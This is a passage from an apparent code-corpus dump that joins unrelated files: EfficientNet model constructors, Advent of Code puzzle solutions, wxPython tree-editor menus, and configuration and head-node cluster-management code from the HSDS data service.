**kwargs)
def EfficientNetB1(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.0, 1.1, 240, 0.2,
model_name='efficientnet-b1',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB2(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.1, 1.2, 260, 0.3,
model_name='efficientnet-b2',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB3(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.2, 1.4, 300, 0.3,
model_name='efficientnet-b3',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB4(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.4, 1.8, 380, 0.4,
model_name='efficientnet-b4',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB5(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.6, 2.2, 456, 0.4,
model_name='efficientnet-b5',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB6(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.8, 2.6, 528, 0.5,
model_name='efficientnet-b6',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB7(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(2.0, 3.1, 600, 0.5,
model_name='efficientnet-b7',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
``` |
{
"source": "JonoRicci/Advent-Of-Code",
"score": 4
} |
#### File: day-09/solution-01/day-09.py
```python
def main() -> None:
"""
Imports puzzle input, processes data and displays result.
"""
data_stream = import_puzzle()
# Part 01
invalid_number = get_invalid_number(data_stream)
print(f"Part 01: The invalid number is {invalid_number}.")
# Part 02
print(
f"Part 02: The encryption weakness number is {get_encryption_weakness(data_stream, invalid_number)}."
)
def get_encryption_weakness(data_stream: list, invalid_number: int) -> int:
"""
Loop through the whole data stream (minus the last value).
    For each starting position, keep extending a contiguous run of numbers.
    If the running sum equals the invalid number, the weakness range is found.
:return: The sum of the min and max of the contiguous stream.
:rtype: int
"""
found = False
for i in range(len(data_stream) - 1):
numbers = [data_stream[i]]
for j in range(i + 1, len(data_stream)):
numbers.append(data_stream[j])
if sum(numbers) == invalid_number:
found = True
break
elif sum(numbers) > invalid_number:
break
if found:
break
return min(numbers) + max(numbers)
def get_invalid_number(data_stream: list) -> int:
"""
    Loop through the data stream starting at the 26th value; the previous
    25 values form the preamble. For each value, check every pair (j, k)
    in the preamble for a sum that matches it.
:return: The invalid number
:rtype: int
"""
for i in range(25, len(data_stream)):
preamble = data_stream[i - 25 : i]
number = data_stream[i]
found = False
# Loop through every combination
for j in range(len(preamble) - 1):
for k in range(j + 1, len(preamble)):
if preamble[j] + preamble[k] == number:
found = True
break # Inner loop
if found:
break # Outer loop
if found:
continue
return number
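# --- Worked example (comments only; taken from the published puzzle example) ---
# With a preamble of 5 (this solution hardcodes 25 for the real input), the sequence
# 35, 20, 15, 25, 47, 40, ... first fails at 127, because no two of the five numbers
# immediately before it sum to 127. The contiguous run 15 + 25 + 47 + 40 = 127 then
# gives an encryption weakness of min + max = 15 + 47 = 62.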
def import_puzzle() -> list:
"""
Import the raw puzzle-input and return.
:return: File as list of lines
:rtype: list
"""
with open("../puzzle-input") as file:
data = file.readlines()
data = [int(line.strip()) for line in data] # Input is list of ints
return data
if __name__ == "__main__":
main()
```
#### File: day-11/solution-01/day-11.py
```python
from typing import Tuple # Type hinting for multiple returns
def main() -> None:
"""
Imports puzzle input, processes seating and displays result.
"""
original_seating = import_puzzle()
# Part 01
seating_count_01 = get_final_count(original_seating, 4)
print(
f"Part 01: There are {seating_count_01[0]} occupied seats after {seating_count_01[1]} rounds of changes."
)
# Part 02
seating_count_02 = get_final_count(original_seating, 5)
print(
f"Part 02: There are {seating_count_02[0]} occupied seats after {seating_count_02[1]} rounds of changes."
)
def get_final_count(seating: list, tolerance: int) -> Tuple[int, int]:
"""
Take in the original seating layout, and render the seating rules against it.
Iterate over the new round of seating and apply the rules again.
    Continue until the previous iteration is identical to the current iteration.
    :return: Count of occupied seats and the number of rounds until the layout stops changing.
    :rtype: Tuple[int, int]
"""
previous = seating.copy()
render_rules(seating, tolerance)
seating_rounds = 0
while seating != previous:
previous = seating.copy()
render_rules(seating, tolerance)
seating_rounds += 1
occupied_seats = get_occupied_seats(previous)
return occupied_seats, seating_rounds - 1
def render_rules(seating: list, tolerance: int) -> list:
"""
Iterate over every position in the seating area.
If a seat (empty or occupied) has been found, calculate the seats around it.
Modify the seat as appropriate.
    Append to a new list of lists representing the seating arrangement.
"""
seating_iteration = []
for row in range(len(seating)):
current_row = seating[row]
new_row = []
for column in range(len(current_row)):
if current_row[column] == ".":
new_row.append(".")
continue
adjacent_count = 0
if tolerance == 4:
adjacent_count = get_adjacent_count(seating, row, column)
elif tolerance == 5:
adjacent_count = get_updated_adjacent_count(seating, row, column)
if current_row[column] == "L" and adjacent_count == 0:
new_row.append("#")
elif current_row[column] == "#" and adjacent_count >= tolerance:
new_row.append("L")
else:
new_row.append(current_row[column])
seating_iteration.append(new_row)
for i in range(len(seating)):
seating[i] = seating_iteration[i]
return seating_iteration
def get_updated_adjacent_count(seating: list, row: int, column: int) -> int:
"""
    Take the current iteration of the seating layout and a position.
    Walk outward in each of the eight directions until the first seat is found,
    counting it if it is occupied.
    :return: Count of visible occupied seats.
:rtype: int
"""
count = 0
north_seat = row - 1
south_seat = row + 1
east_seat = column + 1
west_seat = column - 1
n, s, e, w, ne, se, nw, sw = False, False, False, False, False, False, False, False
while not (n and s and w and e and ne and se and nw and sw):
# North
if not n and north_seat >= 0:
if seating[north_seat][column] == "#":
count += 1
n = True
elif seating[north_seat][column] == "L":
n = True
else:
n = True
# South
if not s and south_seat <= len(seating) - 1:
if seating[south_seat][column] == "#":
count += 1
s = True
elif seating[south_seat][column] == "L":
s = True
else:
s = True
# East
if not e and east_seat <= len(seating[row]) - 1:
if seating[row][east_seat] == "#":
count += 1
e = True
elif seating[row][east_seat] == "L":
e = True
else:
e = True
# West
if not w and west_seat >= 0:
if seating[row][west_seat] == "#":
count += 1
w = True
elif seating[row][west_seat] == "L":
w = True
else:
w = True
# North West
if not nw and north_seat >= 0 and west_seat >= 0:
if seating[north_seat][west_seat] == "#":
count += 1
nw = True
elif seating[north_seat][west_seat] == "L":
nw = True
else:
nw = True
# South West
if not sw and south_seat <= len(seating) - 1 and west_seat >= 0:
if seating[south_seat][west_seat] == "#":
count += 1
sw = True
elif seating[south_seat][west_seat] == "L":
sw = True
else:
sw = True
# North East
if not ne and north_seat >= 0 and east_seat <= len(seating[row]) - 1:
if seating[north_seat][east_seat] == "#":
count += 1
ne = True
elif seating[north_seat][east_seat] == "L":
ne = True
else:
ne = True
# South East
if (
not se
and south_seat <= len(seating) - 1
and east_seat <= len(seating[row]) - 1
):
if seating[south_seat][east_seat] == "#":
count += 1
se = True
elif seating[south_seat][east_seat] == "L":
se = True
else:
se = True
north_seat -= 1
south_seat += 1
east_seat += 1
west_seat -= 1
return count
def get_adjacent_count(seating: list, row: int, column: int) -> int:
"""
Take the current iteration of seating layout, and the position.
Multiple if statements to add to counter when rules are true.
:return: Count of adjacent occupied seats.
:rtype: int
"""
count = 0
current_row = seating[row]
# Check West
if column - 1 >= 0:
if current_row[column - 1] == "#":
count += 1
# Check East
if column + 1 <= len(current_row) - 1:
if current_row[column + 1] == "#":
count += 1
# Check North
if row - 1 >= 0:
north_row = seating[row - 1]
if north_row[column] == "#":
count += 1
if column - 1 >= 0:
if north_row[column - 1] == "#":
count += 1
if column + 1 <= len(north_row) - 1:
if north_row[column + 1] == "#":
count += 1
# Check South
if row + 1 <= len(seating) - 1:
south_row = seating[row + 1]
if south_row[column] == "#":
count += 1
if column - 1 >= 0:
if south_row[column - 1] == "#":
count += 1
if column + 1 <= len(south_row) - 1:
if south_row[column + 1] == "#":
count += 1
return count
def get_occupied_seats(seating: list) -> int:
"""
Iterate over list of lists and for each item check if string is '#' (occupied).
:return: Count of occupied seats.
    :rtype: int
"""
count = 0
for i in range(len(seating)):
for j in range(len(seating[i])):
if seating[i][j] == "#":
count += 1
return count
def import_puzzle() -> list:
"""
Import the raw puzzle-input and return.
:return: File as list of lines
:rtype: list
"""
with open("../puzzle-input") as file:
seating = file.readlines()
seating = [list(line.strip()) for line in seating]
return seating
if __name__ == "__main__":
main()
```
#### File: 2021/day_04/day_04.py
```python
from logger import logger
def main() -> None:
"""
Import the puzzle input, process and display the results.
"""
puzzle_input = import_list()
logger.debug(puzzle_input)
final_score = play_bingo(puzzle_input)
for result in final_score:
logger.info(f"The final score is: {result}.")
def import_list() -> list:
"""
Import the puzzle input and return a list.
:return: Puzzle input text file as list
:rtype: list
"""
    with open("puzzle-input", "r") as file:
        string_list = file.read().splitlines()
return string_list
def play_bingo(bingo_cards: list) -> list:
"""
Extract winning numbers, bingo boards from input.
Make a separate 2D list tracking wins.
For each winning number, check every board row and column for a match.
Add matches to the 2D list tracking wins.
Once done, check 2D list for winning columns / rows.
Add winning boards to new list along with winning number.
Multiply to get score.
:param bingo_cards: puzzle input where each line is a string
:return: First and last winning board score
:rtype: list
"""
winning_numbers = [int(x) for x in bingo_cards[0].split(",")]
logger.debug(f" Winning numbers: {winning_numbers}")
single_board = []
all_boards = []
final_score_list = []
# Get Bingo Boards
for line in range(len(bingo_cards)):
if "," not in bingo_cards[line]:
row = [int(x) for x in bingo_cards[line].split()]
if row:
logger.debug(row)
single_board.append(row)
elif single_board:
all_boards.append(single_board)
single_board = []
# Set up separate 2D list tracking matches to winning numbers.
unmarked_tracker = []
for board in all_boards:
assert len(board) == 5 and len(board[0]) == 5
unmarked_tracker.append([[False for _ in range(5)] for _ in range(5)])
# Set up list to track winning boards.
winning_board = [False for _ in range(len(all_boards))]
for number in winning_numbers:
for index, board in enumerate(all_boards):
logger.debug(f"Checking board: {index} for {number}")
# Check for winning numbers.
for row in range(5):
for column in range(5):
if board[row][column] == number:
logger.debug(f"{unmarked_tracker[index][row][column]} "
f"is True.")
unmarked_tracker[index][row][column] = True
# Check for 5 in a row.
won = False
for row in range(5):
ok = True
for column in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for 5 in a column.
for column in range(5):
ok = True
for row in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for each winning board.
if won and not winning_board[index]:
winning_board[index] = True
winning_boards_count = len([j for j in range(len(all_boards))
if winning_board[j]])
# If first or last board.
if winning_boards_count == 1 or winning_boards_count == \
len(all_boards):
# Calculate all unmarked.
unmarked = 0
for row in range(5):
for column in range(5):
if not unmarked_tracker[index][row][column]:
unmarked += board[row][column]
final_score_list.append(unmarked * number)
logger.debug(f"The final score is: {final_score_list[-1]}, "
f"which is {unmarked} * {number}.")
return final_score_list
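# --- Worked example (comments only; taken from the published puzzle example) ---
# A board wins once a full row or column is marked. Its score is the sum of its
# unmarked numbers multiplied by the number just called; in the puzzle example the
# first winning board has an unmarked sum of 188 and wins on 24, so 188 * 24 = 4512.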
if __name__ == "__main__":
main()
``` |
{
"source": "jonorthwash/treemendous",
"score": 2
} |
#### File: treemendous/src/menus.py
```python
import gettext
import wx
_ = gettext.translation("treemendous", fallback=True).gettext
class AddNodeMenu(wx.Menu):
def __init__(self, parent):
super().__init__()
self.parent = parent
child = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a child in the add node pop-up menu.
_("&Child"),
# Translators: Help text in the add node pop-up menu.
_("Add a new node as an immediate child of the current selection"),
)
self.Append(child)
self.Bind(wx.EVT_MENU, self.OnChild, child)
parent = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a parent in the add node pop-up menu.
_("&Parent"),
# Translators: Help text in the add node pop-up menu.
_("Add a new node that contains the currently selected subtree"),
)
self.Append(parent)
self.Bind(wx.EVT_MENU, self.OnParent, parent)
if self.parent.tree.selection != self.parent.tree.root:
sibling = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a sibling in the add node pop-up menu.
_("&Sibling"),
_(
# Translators: Help text in the add node pop-up menu.
"Add a new node as an immediate sibling (same level) of the current selection"
),
)
self.Append(sibling)
self.Bind(wx.EVT_MENU, self.OnSibling, sibling)
def OnChild(self, event):
return self.parent.DoAddChild()
def OnParent(self, event):
return self.parent.DoAddParent()
def OnSibling(self, event):
return self.parent.DoAddSibling()
class PasteDestMenu(wx.Menu):
def __init__(self, parent, event):
super().__init__()
self.parent = parent
self.event = event
child = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &child"),
# Translators: Help text in the paste pop-up menu.
_("Paste as an immediate child of the current selection"),
)
self.Append(child)
self.Bind(wx.EVT_MENU, self.OnChild, child)
parent = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &parent"),
# Translators: Help text in the paste pop-up menu.
_("Merge the pasteboard with the current selection."),
)
self.Append(parent)
self.Bind(wx.EVT_MENU, self.OnParent, parent)
if self.parent.tree.selection != self.parent.tree.root:
sibling = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &sibling"),
_(
# Translators: Help text in the paste pop-up menu.
"Paste as an immediate sibling (same level) of the current selection"
),
)
self.Append(sibling)
self.Bind(wx.EVT_MENU, self.OnSibling, sibling)
def OnChild(self, event):
return self.parent.PasteChild(self.event)
def OnParent(self, event):
return self.parent.PasteParent(self.event)
def OnSibling(self, event):
return self.parent.PasteSibling(self.event)
class NodeContextMenu(wx.Menu):
def __init__(self, parent):
super().__init__()
self.parent = parent
addSubmenu = AddNodeMenu(parent)
self.AppendSubMenu(
addSubmenu,
# Translators: An item in the node context (shift+f10) menu.
_("&Add node"),
help=_(
# Translators: Help text in the node context (shift+F10) menu.
"Add a new node relative to the current selection."
),
)
edit = wx.MenuItem(
self,
wx.ID_EDIT,
# Translators: An item in the node context (shift+f10) menu.
_("Edit node...\tF2"),
# Translators: Help text in the node context (shift+F10) menu.
_("Edit the currently selected node."),
)
self.Append(edit)
up = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An item in the node context (shift+f10) menu.
_("Move up\tAlt+up"),
# Translators: Help text in the node context (shift+F10) menu.
_("Move subtree to previous position in parent."),
)
self.Append(up)
self.Bind(wx.EVT_MENU, self.OnUp, up)
dn = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An item in the node context (shift+f10) menu.
_("Move down\tAlt+down"),
# Translators: Help text in the node context (shift+F10) menu.
_("Move subtree to next position in parent."),
)
self.Append(dn)
self.Bind(wx.EVT_MENU, self.OnDn, dn)
delsubtree = wx.MenuItem(
self,
wx.ID_DELETE,
# Translators: An item in the node context (shift+f10) menu.
_("&Delete subtree\tDEL"),
# Translators: Help text in the node context (shift+F10) menu.
_("Delete this node and all of its descendants."),
)
self.Append(delsubtree)
def OnUp(self, event):
return self.parent.OnMoveUp(event)
def OnDn(self, event):
return self.parent.OnMoveDown(event)
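# --- Hedged usage sketch (not part of the original file; handler names are placeholders) ---
# These menus are intended to be shown as pop-ups from the owning frame, which is
# expected to provide the tree attribute and the Do*/On* callbacks referenced above:
#
#   def OnAddNode(self, event):
#       self.PopupMenu(AddNodeMenu(self))
#
#   def OnContextMenu(self, event):
#       self.PopupMenu(NodeContextMenu(self))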
``` |
{
"source": "JonosGit/hsds",
"score": 2
} |
#### File: hsds/hsds/config.py
```python
import os
import sys
cfg = {
'allow_noauth': True, # enable unauthenticated requests
'default_public': False, # new domains are publically readable by default
'aws_access_key_id': 'xxx', # Replace with access key for account
'aws_secret_access_key': 'xxx', # Replace with secret key for account
'aws_iam_role': "hsds_role", # For EC2 using IAM roles
'aws_region': 'us-east-1',
'hsds_endpoint': '', # used for hateos links in response
'head_endpoint': '', # optionally used for nodes to register
'aws_s3_gateway': '', # use endpoint for the region HSDS is running in, e.g. 'https://s3.amazonaws.com' for us-east-1
'aws_dynamodb_gateway': 'https://dynamodb.us-east-1.amazonaws.com',
'aws_dynamodb_users_table': '',
'password_salt': '',
    'bucket_name': '', # set to use a default bucket, otherwise bucket param is needed for all requests
'head_host': 'localhost',
'head_port': 5100,
'dn_host': 'localhost',
'dn_port' : 6101, # Start dn ports at 6101
'sn_port': 5101, # Start sn ports at 5101
'target_sn_count': 4,
'target_dn_count': 4,
'log_level': 'INFO', # ERROR, WARNING, INFO, DEBUG, or NOTSET,
'max_tcp_connections': 100,
'head_sleep_time': 10,
'node_sleep_time': 10,
'async_sleep_time': 10,
's3_sync_interval': 10, # time to wait to write object data to S3 (in sec)
'max_chunks_per_request': 2500, # maximum number of chunks to be serviced by one request
'min_chunk_size': '1m', # 1 MB
'max_chunk_size': '4m', # 4 MB
'max_request_size': '100m', # 100 MB - should be no smaller than client_max_body_size in nginx tmpl
    'max_chunks_per_folder': 200000, # max number of chunks per s3 folder. 0 for unlimited
'max_task_count': 100, # maximum number of concurrent tasks before server will return 503 error
'aio_max_pool_connections': 64, # number of connections to keep in conection pool for aiobotocore requests
'metadata_mem_cache_size': '128m',
'chunk_mem_cache_size': '128m', # 128 MB
'timeout': 30, # http timeout - 30 sec
'password_file': '/usr/local/src/hsds/passwd.txt', # filepath to a text file of username/passwords. set to '' for no-auth access
'server_name': 'Highly Scalable Data Service (HSDS)', # this gets returned in the about request
'greeting': 'Welcome to HSDS!',
'about': 'HSDS is a webservice for HDF data',
'top_level_domains': [] # list of possible top-level domains, example: ["/home", "/shared"]
}
def get(x):
# see if there is a command-line override
#print("config get:", x)
option = '--'+x+'='
retval = None
for i in range(1, len(sys.argv)):
#print(i, sys.argv[i])
if sys.argv[i].startswith(option):
# found an override
arg = sys.argv[i]
retval = arg[len(option):] # return text after option string
# see if there are an environment variable override
if not retval and x.upper() in os.environ:
retval = os.environ[x.upper()]
# no command line override, just return the cfg value
if not retval and x in cfg:
retval = cfg[x]
if isinstance(retval, str) and len(retval) > 1 and retval[-1] in ('g', 'm', 'k') and retval[:-1].isdigit():
# convert values like 512m to corresponding integer
u = retval[-1]
n = int(retval[:-1])
if u == 'k':
retval = n * 1024
elif u == 'm':
retval = n * 1024*1024
else: # u == 'g'
retval = n * 1024*1024*1024
return retval
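# --- Worked example (comments added for clarity; values follow from the code above) ---
# Overrides are resolved in order: command line (--key=value), then the upper-cased
# environment variable, then the cfg default. Size suffixes are expanded to bytes:
#   get("metadata_mem_cache_size") -> "128m" -> 128 * 1024 * 1024 = 134217728
#   get("min_chunk_size")          -> "1m"   -> 1048576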
```
#### File: hsds/hsds/headnode.py
```python
import asyncio
import json
import time
from aiohttp.web import Application, StreamResponse, run_app, json_response
from aiohttp import ClientSession, TCPConnector
from aiohttp.web_exceptions import HTTPBadRequest, HTTPInternalServerError
from asyncio import TimeoutError
import aiobotocore
import config
from util.timeUtil import unixTimeToUTC, elapsedTime
from util.httpUtil import http_get, getUrl
from util.idUtil import createNodeId
import hsds_logger as log
NODE_STAT_KEYS = ("cpu", "diskio", "memory", "log_stats", "disk", "netio",
"req_count", "s3_stats", "chunk_cache_stats")
async def healthCheck(app):
""" Periodic method that pings each active node and verifies it is still healthy.
    If node doesn't respond, free up the node slot (the node can re-register if it comes back)."""
app["last_health_check"] = int(time.time())
nodes = app["nodes"]
while True:
# sleep for a bit
sleep_secs = config.get("head_sleep_time")
await asyncio.sleep(sleep_secs)
now = int(time.time())
log.info("health check {}".format(unixTimeToUTC(now)))
fail_count = 0
HEALTH_CHECK_RETRY_COUNT = 1 # times to try before calling a node dead
for node in nodes:
if node["host"] is None:
fail_count += 1
continue
url = getUrl(node["host"], node["port"]) + "/info"
try:
rsp_json = await http_get(app, url)
if "node" not in rsp_json:
log.error("Unexpected response from node")
fail_count += 1
continue
node_state = rsp_json["node"]
node_id = node_state["id"]
if node_id != node['id']:
log.warn("unexpected node_id: {} (expecting: {})".format(node_id, node['id']))
node['host'] = None
node['id'] = None
fail_count += 1
continue
if 'number' in node_state and node_state['number'] != node['node_number']:
msg = "unexpected node_number got {} (expecting: {})"
log.warn(msg.format(node_state["number"], node['node_number']))
node['host'] = None
node['id'] = None
fail_count += 1
continue
# save off other useful info from the node
app_node_stats = app["node_stats"]
node_stats = {}
for k in NODE_STAT_KEYS:
node_stats[k] = rsp_json[k]
app_node_stats[node_id] = node_stats
# mark the last time we got a response from this node
node["healthcheck"] = unixTimeToUTC(int(time.time()))
node["failcount"] = 0 # rest
except OSError as ose:
log.warn("OSError for req: {}: {}".format(url, str(ose)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("node {}:{} not responding".format(node["host"], node["port"]))
fail_count += 1
except HTTPInternalServerError as hpe:
log.warn("HTTPInternalServerError for req: {}: {}".format(url, str(hpe)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("removing {}:{} from active list".format(node["host"], node["port"]))
fail_count += 1
except TimeoutError as toe:
log.warn("Timeout error for req: {}: {}".format(url, str(toe)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("removing {}:{} from active list".format(node["host"], node["port"]))
fail_count += 1
log.info("node health check fail_count: {}".format(fail_count))
if fail_count > 0:
if app["cluster_state"] == "READY":
# go back to INITIALIZING state until another node is registered
log.warn("Fail_count > 0, Setting cluster_state from READY to INITIALIZING")
app["cluster_state"] = "INITIALIZING"
elif fail_count == 0 and app["cluster_state"] != "READY":
log.info("All nodes healthy, changing cluster state to READY")
app["cluster_state"] = "READY"
async def info(request):
"""HTTP Method to return node state to caller"""
log.request(request)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
answer = {}
# copy relevant entries from state dictionary to response
answer['id'] = request.app['id']
answer['start_time'] = unixTimeToUTC(app['start_time'])
answer['last_health_check'] = unixTimeToUTC(app['last_health_check'])
answer['up_time'] = elapsedTime(app['start_time'])
answer['cluster_state'] = app['cluster_state']
answer['bucket_name'] = app['bucket_name']
answer['target_sn_count'] = getTargetNodeCount(app, "sn")
answer['active_sn_count'] = getActiveNodeCount(app, "sn")
answer['target_dn_count'] = getTargetNodeCount(app, "dn")
answer['active_dn_count'] = getActiveNodeCount(app, "dn")
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def register(request):
""" HTTP method for nodes to register with head node"""
log.request(request)
app = request.app
text = await request.text()
# body = await request.json()
body = json.loads(text)
log.info("body: {}".format(body))
if 'id' not in body:
msg = "Missing 'id'"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
if 'port' not in body:
msg = "missing key 'port'"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
if 'node_type' not in body:
raise HTTPBadRequest(reason="missing key 'node_type'")
if body['node_type'] not in ('sn', 'dn'):
msg="invalid node_type"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
peername = request.transport.get_extra_info('peername')
if peername is None:
raise HTTPBadRequest(reason="Can not determine caller IP")
host, req_port = peername
log.info("register host: {}, port: {}".format(host, req_port))
nodes = None
ret_node = None
node_ids = app['node_ids']
if body['id'] in node_ids:
# already registered?
ret_node = node_ids[body['id']]
else:
nodes = app['nodes']
for node in nodes:
if node['host'] is None and node['node_type'] == body['node_type']:
# found a free node
log.info("got free node: {}".format(node))
node['host'] = host
node['port'] = body["port"]
node['id'] = body["id"]
node["connected"] = unixTimeToUTC(int(time.time()))
node['failcount'] = 0
ret_node = node
node_ids[body["id"]] = ret_node
break
if ret_node is None:
log.info("no free node to assign")
inactive_node_count = getInactiveNodeCount(app)
log.info("inactive_node_count: {}".format(inactive_node_count))
if inactive_node_count == 0:
# all the nodes have checked in
log.info("setting cluster state to ready")
app['cluster_state'] = "READY"
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
answer = {}
if ret_node is not None:
answer["node_number"] = ret_node["node_number"]
else:
# all nodes allocated, let caller know it's in the reserve pool
answer["node_number"] = -1
answer["node_count"] = app["target_dn_count"]
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def nodestate(request):
"""HTTP method to return information about registed nodes"""
log.request(request)
node_type = request.match_info.get('nodetype', '*')
node_number = '*'
if node_type != '*':
node_number = request.match_info.get('nodenumber', '*')
log.info("nodestate/{}/{}".format(node_type, node_number))
if node_type not in ("sn", "dn", "*"):
msg="invalid node_type"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
if node_number == '*':
nodes = []
for node in app["nodes"]:
if node["node_type"] == node_type or node_type == "*":
nodes.append(node)
answer = {"nodes": nodes }
else:
answer = {}
for node in app["nodes"]:
if node["node_type"] == node_type and str(node["node_number"]) == node_number:
answer = node
break
answer["cluster_state"] = app["cluster_state"]
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def nodeinfo(request):
"""HTTP method to return node stats (cpu usage, request count, errors, etc.) about registed nodes"""
log.request(request)
node_stat_keys = NODE_STAT_KEYS
stat_key = request.match_info.get('statkey', '*')
if stat_key != '*':
if stat_key not in node_stat_keys:
raise HTTPBadRequest(reason="invalid key: {}".format(stat_key))
node_stat_keys = (stat_key,)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
app_node_stats = app["node_stats"]
dn_count = app['target_dn_count']
sn_count = app['target_sn_count']
answer = {}
# re-assemble the individual node stats to arrays indexed by node number
for stat_key in node_stat_keys:
log.info("stat_key: {}".format(stat_key))
stats = {}
for node in app["nodes"]:
node_number = node["node_number"]
node_type = node["node_type"]
if node_type not in ("sn", "dn"):
log.error("unexpected node_type: {}".format(node_type))
continue
node_id = node["id"]
log.info("app_node_stats: {}".format(app_node_stats))
if node_id not in app_node_stats:
log.info("node_id: {} not found in node_stats".format(node_id))
continue
node_stats = app_node_stats[node_id]
if stat_key not in node_stats:
log.info("key: {} not found in node_stats for node_id: {}".format(stat_key, node_id))
continue
stats_field = node_stats[stat_key]
for k in stats_field:
if k not in stats:
stats[k] = {}
stats[k]["sn"] = [0,] * sn_count
stats[k]["dn"] = [0,] * dn_count
stats[k][node_type][node_number] = stats_field[k]
answer[stat_key] = stats
resp = json_response(answer)
log.response(request, resp=resp)
return resp
def getTargetNodeCount(app, node_type):
count = None
if node_type == "dn":
count = app['target_dn_count']
elif node_type == "sn":
count = app['target_sn_count']
return count
def getActiveNodeCount(app, node_type):
count = 0
for node in app['nodes']:
if node["node_type"] == node_type and node["host"] is not None:
count += 1
return count
def getInactiveNodeCount(app):
count = 0
for node in app['nodes']:
if node['host'] is None:
count += 1
return count
async def init(loop):
"""Intitialize application and return app object"""
app = Application(loop=loop)
# set a bunch of global state
app["id"] = createNodeId("head")
app["cluster_state"] = "INITIALIZING"
app["start_time"] = int(time.time()) # seconds after epoch
app["target_sn_count"] = int(config.get("target_sn_count"))
app["target_dn_count"] = int(config.get("target_dn_count"))
log.info("target_sn_count: {}".format(app["target_sn_count"]))
log.info("target_dn_count: {}".format(app["target_dn_count"]))
bucket_name = config.get("bucket_name")
if bucket_name:
log.info("using bucket: {}".format(bucket_name))
app["bucket_name"] = bucket_name
else:
log.info("No default bucket name is set")
app["head_host"] = config.get("head_host")
app["head_port"] = config.get("head_port")
nodes = []
for node_type in ("dn", "sn"):
target_count = getTargetNodeCount(app, node_type)
for i in range(target_count):
node = {"node_number": i,
"node_type": node_type,
"host": None,
"port": None,
"id": None }
nodes.append(node)
app["nodes"] = nodes
app["node_stats"] = {} # stats retuned by node/info request. Keyed by node id
app["node_ids"] = {} # dictionary to look up node by id
app.router.add_get('/', info)
app.router.add_get('/nodestate', nodestate)
app.router.add_get('/nodestate/{nodetype}', nodestate)
app.router.add_get('/nodestate/{nodetype}/{nodenumber}', nodestate)
app.router.add_get('/nodeinfo', nodeinfo)
app.router.add_get('/nodeinfo/{statkey}', nodeinfo)
app.router.add_get('/info', info)
app.router.add_post('/register', register)
return app
#
# Main
#
if __name__ == '__main__':
loop = asyncio.get_event_loop()
app = loop.run_until_complete(init(loop))
# create a client Session here so that all client requests
# will share the same connection pool
max_tcp_connections = int(config.get("max_tcp_connections"))
app['client'] = ClientSession(loop=loop, connector=TCPConnector(limit=max_tcp_connections))
session = aiobotocore.get_session(loop=loop)
app["session"] = session
app["loop"] = loop
asyncio.ensure_future(healthCheck(app), loop=loop)
head_port = config.get("head_port")
log.info("Starting service on port: {}".format(head_port))
log.debug("debug test")
run_app(app, port=int(head_port))
```
#### File: hsds/tools/bucket_scan.py
```python
import asyncio
import sys
from aiobotocore import get_session
from aiohttp.web_exceptions import HTTPNotFound, HTTPInternalServerError
from util.s3Util import releaseClient, getS3Keys, getS3JSONObj
from util.idUtil import getObjId
from async_lib import scanRoot
import config
import hsds_logger as log
# List all root keys and create/update info.json
# Note: only works with schema v2 domains!
async def getS3RootKeysCallback(app, s3keys):
